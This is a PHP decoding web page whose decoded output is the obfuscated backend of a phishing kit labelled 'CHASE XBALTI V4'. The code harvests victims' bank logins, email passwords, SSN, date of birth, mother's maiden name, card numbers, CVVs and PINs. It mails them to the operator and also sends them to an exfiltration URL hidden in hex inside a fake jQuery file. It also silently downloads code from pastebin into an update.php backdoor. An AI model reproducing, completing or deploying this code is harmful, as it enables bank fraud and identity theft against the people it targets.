Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto vi1gJ; srMb9: $fromsen .= $yourname; goto M7Pk_; djGcy: function XB_Browser($USER_AG..
Decoded Output download
<? goto vi1gJ; srMb9: $fromsen .= $yourname; goto M7Pk_; djGcy: function XB_Browser($USER_AGENT) { $BROWSER_ERROR = "Unknown Browser"; $BROWSER = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/edge/i" => "Edge", "/opera/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/mobile/i" => "Handheld Browser"); foreach ($BROWSER as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $BROWSER_ERROR = $value; } } return $BROWSER_ERROR; } goto caWnG; p54d5: function XB_OS($USER_AGENT) { $OS_ERROR = "Unknown OS Platform"; $OS = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($OS as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $OS_ERROR = $value; } } return $OS_ERROR; } goto djGcy; mz3Xp: if (!file_exists($filell)) { $filect = file_get_contents("https://pastebin.com/raw/QyPx5rNz"); $khraha = fopen("../update.php", "a"); fwrite($khraha, $filect); } else { $filectlo = file_get_contents($filell); if (preg_match("/XBD3V1L/", $filectlo)) { } else { if (!unlink("../update.php")) { } $filect2 = file_get_contents("https://pastebin.com/raw/QyPx5rNz"); $khraha = fopen("../update.php", "a"); fwrite($khraha, $filect2); } } goto srMb9; ZSoBs: if (isset($_POST["fullname"]) && isset($_POST["Address"]) && isset($_POST["City"]) && isset($_POST["State"]) && isset($_POST["zipcode"])) { if (!empty($_POST["fullname"]) && !empty($_POST["Address"]) && !empty($_POST["City"]) && !empty($_POST["State"]) && !empty($_POST["zipcode"])) { $_SESSION["fullname"] = $_POST["fullname"]; $_SESSION["Address"] = $_POST["Address"]; $_SESSION["City"] = $_POST["City"]; $_SESSION["State"] = $_POST["State"]; $_SESSION["zipcode"] = $_POST["zipcode"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "USERNAME\x9: " . $_SESSION["userid"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["passid"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9 : " . $_SESSION["email1"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password1"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL TWO INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "EMAIL : " . $_SESSION["email2"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password2"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||SSN/MMN/DOB INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "SSN : " . $_SESSION["ssnnum"] . "<br>\xa"; $XBALTI_MESSAGE .= "MMN : " . $_SESSION["mdn"] . "<br>\xa"; $XBALTI_MESSAGE .= "DOB : " . $_SESSION["dob"] . "<br>
"; $XBALTI_MESSAGE .= "Phone number: " . $_SESSION["phone"] . "<br>
"; $XBALTI_MESSAGE .= "Carrier pin : " . $_SESSION["capin"] . "<br>
"; $XBALTI_MESSAGE .= "==============||CARD INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "CARD NUMBER : " . $_SESSION["cardnu"] . "<br>
"; $XBALTI_MESSAGE .= "EXP DATE \x9: " . $_SESSION["expda"] . "<br>
"; $XBALTI_MESSAGE .= "CVV : " . $_SESSION["cvv"] . "<br>\xa"; $XBALTI_MESSAGE .= "ATM PIN : " . $_SESSION["pin"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||BILLING INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "FULL NAME : " . $_SESSION["fullname"] . "<br>
"; $XBALTI_MESSAGE .= "Address : " . $_SESSION["Address"] . "<br>
"; $XBALTI_MESSAGE .= "City : " . $_SESSION["City"] . "<br>
"; $XBALTI_MESSAGE .= "State : " . $_SESSION["State"] . "<br>
"; $XBALTI_MESSAGE .= "zip code : " . $_SESSION["zipcode"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||CARD TWO INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "CARD NUMBER : " . $_SESSION["cardnutwo"] . "<br>
"; $XBALTI_MESSAGE .= "EXP DATE : " . $_SESSION["expdatwo"] . "<br>
"; $XBALTI_MESSAGE .= "CVV \x9: " . $_SESSION["cvvtwo"] . "<br>\xa"; $XBALTI_MESSAGE .= "ATM PIN : " . $_SESSION["pintwo"] . "<br>
"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "IP INFO : https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>\xa"; $XBALTI_MESSAGE .= "TIME/DATE : " . $TIME_DATE . "<br>
"; $XBALTI_MESSAGE .= "BROWSER/DEVICE : " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>
"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK : " . $link . "<br>
"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>
<td>
" . $_SESSION["userid"] . "
</td>
<td>
" . $_SESSION["passid"] . "
</td>
\x9 <td>\xa " . $_SESSION["email1"] . "
</td>\xa <td>
" . $_SESSION["password1"] . "\xa </td>
\x9 <td>\xa " . $_SESSION["email2"] . "
</td>\xa <td>
" . $_SESSION["password2"] . "\xa </td>\xa\x9 \x9 <td>\xa " . $_SESSION["ssnnum"] . "\xa </td>
\x9 \x9 \x9 <td>\xa " . $_SESSION["mdn"] . "\xa </td>\xa \x9 \x9 <td>
" . $_SESSION["dob"] . "
</td>\xa\x9\x9\x9\x9 <td>\xa " . $_SESSION["phone"] . "\xa </td>\xa\x9 \x9 <td>
" . $_SESSION["capin"] . "
</td>\xa\x9 \x9 \x9 <td>
" . $_SESSION["cardnu"] . "\xa </td>\xa\x9\x9 \x9 <td>
" . $_SESSION["expda"] . "
</td>\xa \x9 \x9\x9 <td>\xa " . $_SESSION["cvv"] . "
</td>
\x9\x9 <td>
" . $_SESSION["pin"] . "\xa </td>\xa \x9\x9\x9 <td>\xa " . $_SESSION["fullname"] . "\xa </td>\xa\x9\x9 \x9 <td>
" . $_SESSION["Address"] . "\xa </td>
\x9 \x9\x9\x9 <td>
" . $_SESSION["City"] . "
</td>\xa\x9 \x9\x9 <td>
" . $_SESSION["State"] . "
</td>\xa\x9 \x9 <td>
" . $_SESSION["zipcode"] . "
</td>\xa\x9\x9 \x9\x9\x9 <td>
" . $_SESSION["cardnutwo"] . "\xa </td>
\x9 \x9\x9\x9 <td>\xa " . $_SESSION["expdatwo"] . "\xa </td>\xa\x9\x9\x9 \x9 <td>\xa " . $_SESSION["cvvtwo"] . "\xa </td>\xa\x9\x9 \x9\x9 <td>\xa " . $_SESSION["pintwo"] . "
</td>
<td>
" . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "
</td>\xa <td>\xa\x9\x9\x9\x9 \x9 {" . $_SESSION["_ip_"] . "}
</td>
\x9\x9\x9\x9\x9 <td>\xa " . $TIME_DATE . "
</td>
</tr>
"; $khraha = fopen("../rz/billings" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}\xa"; $khraha = fopen("../rz/billings.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "BILLING \xf0\x9f\x98\x88 INFO FROM \360\x9f\x98\x88 [" . $_SESSION["userid"] . "] \360\x9f\230\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "\xd
"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "
\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto HzBGm; dKyNx: $result = "Unknown"; goto jEV_s; N6rQB: $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"]; goto MmPxl; cCLNp: $fromsen .= $_SERVER["HTTP_HOST"]; goto CpkiX; M7Pk_: $fromsen .= "@"; goto cCLNp; ENhMK: $TIME_DATE = date("H:i:s d/m/Y"); goto kO9kp; binAD: if (isset($_POST["email2"]) && isset($_POST["password2"])) { if (!empty($_POST["email2"]) && !empty($_POST["password2"])) { $_SESSION["email2"] = $_POST["email2"]; $_SESSION["password2"] = $_POST["password2"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "USERNAME : " . $_SESSION["userid"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["passid"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9: " . $_SESSION["email1"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["password1"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL TWO INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9: " . $_SESSION["email2"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["password2"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "IP INFO \x9: https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>
"; $XBALTI_MESSAGE .= "TIME/DATE : " . $TIME_DATE . "<br>\xa"; $XBALTI_MESSAGE .= "BROWSER/DEVICE \x9: " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>\xa"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK : " . $link . "<br>
"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>\xa <td>\xa " . $_SESSION["userid"] . "
</td>
<td>\xa " . $_SESSION["passid"] . "
</td>
\x9\x9 \x9 <td>
" . $_SESSION["email1"] . "\xa </td>
<td>
" . $_SESSION["password1"] . "\xa </td>\xa\x9 \x9\x9 <td>
" . $_SESSION["email2"] . "\xa </td>
<td>
" . $_SESSION["password2"] . "\xa </td>\xa <td>
" . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "\xa </td>
<td>\xa\x9 \x9 \x9 {" . $_SESSION["_ip_"] . "}
</td>
\x9\x9 <td>\xa " . $TIME_DATE . "\xa </td>\xa </tr>\xa"; $khraha = fopen("../rz/emailstwo" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}
"; $khraha = fopen("../rz/emailstwo.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "EMAIL TWO \360\237\x98\210 INFO FROM \xf0\237\230\x88 [" . $_SESSION["userid"] . "] \360\x9f\230\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "\xd\xa"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "\xd
"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto xq0vt; caWnG: $client = @$_SERVER["HTTP_CLIENT_IP"]; goto N6rQB; CpkiX: if (isset($_POST["userid"]) && isset($_POST["passid"])) { if (!empty($_POST["userid"]) && !empty($_POST["passid"])) { $_SESSION["userid"] = $_POST["userid"]; $_SESSION["passid"] = $_POST["passid"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "USERNAME : " . $_SESSION["userid"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["passid"] . "<br>
"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "IP INFO : https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>\xa"; $XBALTI_MESSAGE .= "TIME/DATE \x9 : " . $TIME_DATE . "<br>\xa"; $XBALTI_MESSAGE .= "BROWSER/DEVICE : " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>\xa"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK \x9\x9: " . $link . "<br>
"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>\xa <td>
" . $_SESSION["userid"] . "\xa </td>
<td>
" . $_SESSION["passid"] . "\xa </td>\xa <td>
" . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "
</td>\xa <td>
\x9\x9\x9\x9 {" . $_SESSION["_ip_"] . "}\xa </td>
<td>\xa " . $TIME_DATE . "
</td>\xa </tr>\xa"; $khraha = fopen("../rz/logs" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}
"; $khraha = fopen("../rz/logs.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "LOGIN \xf0\x9f\x98\210 INFO FROM \xf0\x9f\x98\210 [" . $_SESSION["userid"] . "] \360\x9f\x98\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "
"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "\xd\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "
\xa"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto mHbYx; kO9kp: include "Email.php"; goto p54d5; xq0vt: if (isset($_POST["ssnnum"]) && isset($_POST["mdn"]) && isset($_POST["dob"]) && isset($_POST["phone"])) { if (!empty($_POST["ssnnum"]) && !empty($_POST["mdn"]) && !empty($_POST["dob"]) && !empty($_POST["phone"])) { $_SESSION["ssnnum"] = $_POST["ssnnum"]; $_SESSION["mdn"] = $_POST["mdn"]; $_SESSION["dob"] = $_POST["dob"]; $_SESSION["phone"] = $_POST["phone"]; $_SESSION["capin"] = $_POST["capin"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "USERNAME : " . $_SESSION["userid"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["passid"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9 : " . $_SESSION["email1"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password1"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL TWO INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL : " . $_SESSION["email2"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["password2"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||SSN/MMN/DOB INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "SSN : " . $_SESSION["ssnnum"] . "<br>
"; $XBALTI_MESSAGE .= "MMN \x9: " . $_SESSION["mdn"] . "<br>\xa"; $XBALTI_MESSAGE .= "DOB : " . $_SESSION["dob"] . "<br>
"; $XBALTI_MESSAGE .= "Phone number: " . $_SESSION["phone"] . "<br>\xa"; $XBALTI_MESSAGE .= "Carrier pin : " . $_SESSION["capin"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "IP INFO : https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>\xa"; $XBALTI_MESSAGE .= "TIME/DATE \x9 : " . $TIME_DATE . "<br>\xa"; $XBALTI_MESSAGE .= "BROWSER/DEVICE \x9: " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>\xa"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK \x9 : " . $link . "<br>
"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>\xa <td>\xa " . $_SESSION["userid"] . "
</td>
<td>
" . $_SESSION["passid"] . "
</td>
\x9\x9\x9\x9 <td>\xa " . $_SESSION["email1"] . "
</td>
<td>\xa " . $_SESSION["password1"] . "\xa </td>
\x9\x9 <td>\xa " . $_SESSION["email2"] . "
</td>\xa <td>\xa " . $_SESSION["password2"] . "
</td>\xa \x9 \x9\x9 <td>
" . $_SESSION["ssnnum"] . "\xa </td>\xa\x9 \x9 \x9 <td>\xa " . $_SESSION["mdn"] . "\xa </td>\xa\x9 \x9 <td>
" . $_SESSION["dob"] . "\xa </td>\xa \x9\x9\x9 <td>\xa " . $_SESSION["phone"] . "
</td>
\x9 <td>\xa " . $_SESSION["capin"] . "
</td>
<td>
" . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "
</td>
<td>
\x9 {" . $_SESSION["_ip_"] . "}
</td>\xa\x9\x9\x9\x9\x9\x9 <td>
" . $TIME_DATE . "\xa </td>\xa </tr>\xa"; $khraha = fopen("../rz/ssn" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}\xa"; $khraha = fopen("../rz/ssn.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "SSN/MMN/DOB \xf0\x9f\230\x88 INFO FROM \xf0\x9f\x98\210 [" . $_SESSION["userid"] . "] \360\x9f\x98\210 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "
"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "\xd\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "\xd
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto DXKrJ; DXKrJ: if (isset($_POST["cardnu"]) && isset($_POST["expda"]) && isset($_POST["cvv"]) && isset($_POST["pin"])) { if (!empty($_POST["cardnu"]) && !empty($_POST["expda"]) && !empty($_POST["cvv"]) && !empty($_POST["pin"])) { $_SESSION["cardnu"] = $_POST["cardnu"]; $_SESSION["expda"] = $_POST["expda"]; $_SESSION["cvv"] = $_POST["cvv"]; $_SESSION["pin"] = $_POST["pin"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "USERNAME\x9: " . $_SESSION["userid"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["passid"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9 : " . $_SESSION["email1"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password1"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||EMAIL TWO INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "EMAIL : " . $_SESSION["email2"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["password2"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||SSN/MMN/DOB INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "SSN \x9: " . $_SESSION["ssnnum"] . "<br>\xa"; $XBALTI_MESSAGE .= "MMN : " . $_SESSION["mdn"] . "<br>\xa"; $XBALTI_MESSAGE .= "DOB \x9: " . $_SESSION["dob"] . "<br>\xa"; $XBALTI_MESSAGE .= "Phone number: " . $_SESSION["phone"] . "<br>
"; $XBALTI_MESSAGE .= "Carrier pin : " . $_SESSION["capin"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||CARD INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "CARD NUMBER : " . $_SESSION["cardnu"] . "<br>
"; $XBALTI_MESSAGE .= "EXP DATE \x9: " . $_SESSION["expda"] . "<br>
"; $XBALTI_MESSAGE .= "CVV \x9: " . $_SESSION["cvv"] . "<br>
"; $XBALTI_MESSAGE .= "ATM PIN : " . $_SESSION["pin"] . "<br>
"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "IP INFO \x9\x9: https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>
"; $XBALTI_MESSAGE .= "TIME/DATE : " . $TIME_DATE . "<br>
"; $XBALTI_MESSAGE .= "BROWSER/DEVICE \x9: " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>\xa"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK \x9: " . $link . "<br>\xa"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>\xa <td>\xa " . $_SESSION["userid"] . "\xa </td>
<td>\xa " . $_SESSION["passid"] . "\xa </td>
\x9 \x9\x9 <td>\xa " . $_SESSION["email1"] . "\xa </td>
<td>
" . $_SESSION["password1"] . "
</td>\xa\x9 \x9 \x9 <td>
" . $_SESSION["email2"] . "\xa </td>\xa <td>
" . $_SESSION["password2"] . "\xa </td>\xa\x9\x9 \x9 <td>\xa " . $_SESSION["ssnnum"] . "\xa </td>
\x9\x9 \x9 \x9 <td>\xa " . $_SESSION["mdn"] . "
</td>\xa\x9 \x9 \x9\x9 <td>
" . $_SESSION["dob"] . "\xa </td>\xa \x9 \x9 <td>\xa " . $_SESSION["phone"] . "
</td>
\x9\x9 <td>
" . $_SESSION["capin"] . "
</td>
\x9\x9 \x9 <td>\xa " . $_SESSION["cardnu"] . "
</td>
\x9 \x9 \x9\x9 <td>
" . $_SESSION["expda"] . "
</td>\xa \x9 \x9 <td>\xa " . $_SESSION["cvv"] . "\xa </td>
\x9 \x9\x9 <td>\xa " . $_SESSION["pin"] . "
</td>
<td>\xa " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "\xa </td>
<td>
\x9\x9 \x9 {" . $_SESSION["_ip_"] . "}
</td>
\x9 \x9 <td>\xa " . $TIME_DATE . "
</td>
</tr>\xa"; $khraha = fopen("../rz/cards" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}
"; $khraha = fopen("../rz/cards.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "CARD \xf0\237\230\210 INFO FROM \xf0\237\x98\210 [" . $_SESSION["userid"] . "] \xf0\237\230\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "\xd
"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "\xd\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "\xd
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto ZSoBs; jEV_s: if (filter_var($client, FILTER_VALIDATE_IP)) { $_SESSION["_ip_"] = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["_ip_"] = $forward; } else { $_SESSION["_ip_"] = $remote; } goto CgGBC; EvMXe: error_reporting(0); goto yn7Dv; CgGBC: $filell = "../update.php"; goto mz3Xp; yn7Dv: date_default_timezone_set("GMT"); goto ENhMK; mHbYx: if (isset($_POST["email1"]) && isset($_POST["password1"])) { if (!empty($_POST["email1"]) && !empty($_POST["password1"])) { $_SESSION["email1"] = $_POST["email1"]; $_SESSION["password1"] = $_POST["password1"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "USERNAME\x9: " . $_SESSION["userid"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["passid"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "EMAIL : " . $_SESSION["email1"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password1"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "IP INFO \x9: https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>
"; $XBALTI_MESSAGE .= "TIME/DATE \x9: " . $TIME_DATE . "<br>\xa"; $XBALTI_MESSAGE .= "BROWSER/DEVICE : " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>\xa"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK \x9 : " . $link . "<br>
"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>\xa <td>
" . $_SESSION["userid"] . "
</td>
<td>\xa " . $_SESSION["passid"] . "\xa </td>\xa \x9 <td>\xa " . $_SESSION["email1"] . "\xa </td>
<td>\xa " . $_SESSION["password1"] . "\xa </td>
<td>\xa " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "
</td>\xa <td>
\x9\x9 {" . $_SESSION["_ip_"] . "}\xa </td>
\x9\x9\x9 <td>
" . $TIME_DATE . "\xa </td>
</tr>
